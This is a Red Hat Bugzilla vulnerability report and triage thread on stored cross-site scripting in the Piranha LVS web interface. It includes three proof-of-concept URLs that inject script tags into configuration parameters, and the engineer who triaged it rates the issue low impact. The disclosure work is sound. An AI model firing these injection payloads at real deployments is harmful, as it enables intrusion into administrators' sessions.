Bugzilla (bugzilla.redhat.com) will be under maintenance for infrastructure upgrades and will not be available on July 31st between 12:30 AM - 05:30 AM UTC. We appreciate your understanding and patience. You can follow status.redhat.com for details.
Bug 1051551 - piranha: multiple stored XSS issues
Summary: piranha: multiple stored XSS issues
Keywords:
Status: CLOSED WONTFIX
Alias: None
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: Unspecified
OS: Unspecified
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1275699
Blocks: 1062151
TreeView+ depends on / blocked
 
Reported: 2014-01-10 14:52 UTC by Othman Madjoudj
Modified: 2019-09-29 13:12 UTC (History)
5 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2015-10-27 21:55:48 UTC


Attachments (Terms of Use)
A screenshot of one of the issues (100.47 KB, image/png)
2014-01-10 14:54 UTC, Othman Madjoudj
no flags Details

Description Othman Madjoudj 2014-01-10 14:52:31 UTC
Description of the issue:

It seems that Piranha web application does not escape its output and/or user input (hostnames/IPs/etc...) which leads to Cross Site Scripting vulnerabilities, some of them are reflected (low impact) and some are persistent/stored (high impact) in the configuration file '/etc/sysconfig/ha/lvs.cf'


Tested version: 

piranha-0.8.6-4.el6.x86_64

Examples of the vulnerabilities:

1) stored XSS in hostname parameter (virtual_main.php / virtual_edit_virt.php):
NB. port, address and other parameters are also vulnerable

PoC:
----
http://server:3636/secure/virtual_edit_virt.php?hostname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&port=80&protocol=tcp&address=0.0.0.0&vip_nmask=Unused&sorry_server=&fwmark=&device=eth0%3A1&reentry=15&timeout=6&quiesce_server=0&load=none&sched=Weighted+least-connections&persistent=&pmask=Unused&selected_host=1&vev_action=ACCEPT

Result:
The injection in the PoC will appear in the following page:
http://server:3636/secure/virtual_main.php

Relevant part of '/etc/sysconfig/ha/lvs.cf':

[...]
virtual <script>alert(1)</script> {
     active = 0
     address = 0.0.0.0 eth0:1
     port = 80
     send = "GET / HTTP/1.0\r\n\r\n"
     expect = "HTTP"
     use_regex = 0
     load_monitor = none
     scheduler = wlc
     protocol = tcp
     timeout = 6
     reentry = 15
     quiesce_server = 0
}

2) stored XSS in redundant parameter (redundancy.php)
NB. other parameters could also be vulnerable.

PoC:
----
http://server:3636/secure/redundancy.php?redundant=0.0.0.0%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&hb_interval=6&dead_after=18&hb_port=539&syncd_iface=&syncd_id=&redundancy_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':
[...]
backup = 0.0.0.0><script>alert(1)</script>
[...]


3) stored XSS in PriLVSIP (global_settings.php)
NB. other parameters could also be vulnerable.

PoC:
----
http://192.168.1.100:3636/secure/global_settings.php?PriLVSIP=192.168.1.100%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&primary_private=&tcp_timeout=&tcpfin_timeout=&udp_timeout=&global_action=ACCEPT

Relevant part of '/etc/sysconfig/ha/lvs.cf':
[...]
primary = 192.168.1.100"><script>alert(1)</script>
[...]

Comment 1 Othman Madjoudj 2014-01-10 14:54:32 UTC
Created attachment 848233 [details]
A screenshot of one of the issues

Comment 2 Tomas Hoger 2014-02-05 20:35:04 UTC
(In reply to Athmane Madjoudj from comment #0)
> which leads to Cross Site Scripting vulnerabilities, some of them are
> reflected (low impact)

Your report do not seem to specify any reflected XSS, only 3 stored XSS are listed.

> and some are persistent/stored (high impact) in the configuration file
> '/etc/sysconfig/ha/lvs.cf'

That's correct, input from lvs.cf are not encoded properly before being added to the output of the web application.  However, I disagree with the high impact rating.  For the application, lvs.cf is really a trusted input for the application.  Also privileges to edit the file via the web application are administrative privileges, which make this more of a bug than a real security issue.

Comment 6 Othman Madjoudj 2014-02-05 21:43:20 UTC
(In reply to Tomas Hoger from comment #2)
> (In reply to Athmane Madjoudj from comment #0)
> > which leads to Cross Site Scripting vulnerabilities, some of them are
> > reflected (low impact)
> 
> Your report do not seem to specify any reflected XSS, only 3 stored XSS are
> listed.
> 

I didn't have time to check everything, so I could be wrong about reflected XSS.


> > and some are persistent/stored (high impact) in the configuration file
> > '/etc/sysconfig/ha/lvs.cf'
> 
> That's correct, input from lvs.cf are not encoded properly before being
> added to the output of the web application.  However, I disagree with the
> high impact rating.  For the application, lvs.cf is really a trusted input
> for the application.  Also privileges to edit the file via the web
> application are administrative privileges, which make this more of a bug
> than a real security issue.

True


Note You need to log in before you can comment on or make changes to this bug.